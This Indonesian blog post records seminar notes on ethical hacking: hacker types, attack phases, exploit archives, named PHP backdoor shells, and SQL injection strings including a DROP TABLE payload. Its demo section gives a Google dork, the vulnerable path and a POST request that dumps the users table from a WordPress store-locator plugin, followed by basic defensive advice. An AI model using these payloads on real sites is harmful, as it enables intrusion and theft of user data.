Seminar nasional

Jumat, 08 Maret 2013





Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?
-          Perkembangan komputer
-          Ketergantungan manusia
-          Tuntutan kompleksitas semakin tinggi
-          Keamanan menjadi anak tiri
-          Kemampuan orang disebut hacker menjadi menurun
-          Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum

Terminologi hacker
  • Vulnerability
  • Threat
  • Attack
  • Exploit


Contoh Situs yang menyediakan exploits
v  Metasploit Frameworks
v  Exploit-db.com
v  securityfocus.com
v  Darkc0de.com
v  packetstormsecurity.org

Element-element keamanan (CIA)
  • Confidentiality
o   Keamanan informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
  • Integrity / integritas
o   Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
  • Availability
o   Keamanan informasi data untuk ketersediaan atau keberadaannya

Pengelompokkan hacker
  Black Hat Hacker
  White Hat Hacker
  Grey Hat Hacker
  Suicide Hacker

Tahapan aktifitas Hacking
-          Reconnaissance
-          Scanning
-          Gaining Acces
-          Maintaining acces
-          Covering Tracks

Reconnaissance
Reconnaissance Passive
  • Pencarian data target di google
  • Pencarian data target di berbagai jejaring sosial
Reconnaissance Active
-          HTTP Fingerprint

Pencarian exploit berdasarkan scanning
  • Google.com
  • Archive Milw0rm
  • Archive Exploit DB
  • Metasploit Framework
  • Darkc0de

Gaining Acces
  • Exploitasi Remote Execution pada celah keamanan OS
  • Exploitasi Remote Execution pada celah keamanan aplikasi
  • Exploitasi Remote Execution pada celah keamanan web

Maintaining Acces
PHP Backdoor
  • Simple php shell
  • R57
  • C99 / C100
  • ASP Backdoor
  • B374K

Konsep SQL Injection

SQL Injection
-          $query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’
-          $query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;

DEMO WEB HACKING
-          Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
-          Version : 2.7.1 - 3.0.1
-          Date : 26-05-2012
-          Google Dork : inurl:/wp-content/plugins/store-locator-le/
-          Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
-          http://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php

POST Method, Advanced REST Client
v  Method : POST
v  Header : Content-Type: application/x-www-form-urlencoded
v  Data : query=[injection]
v  Contoh:
query=SELECT * FROM wp_users


PENGAMANAN:

Update CMS, plugin
Menggunakan mysql_real_escape_string()
Memberikan validasi pada tiap inputan
Berikan length limit pada inputan
Config database error report
Setting php.ini
dll

0 komentar:

Posting Komentar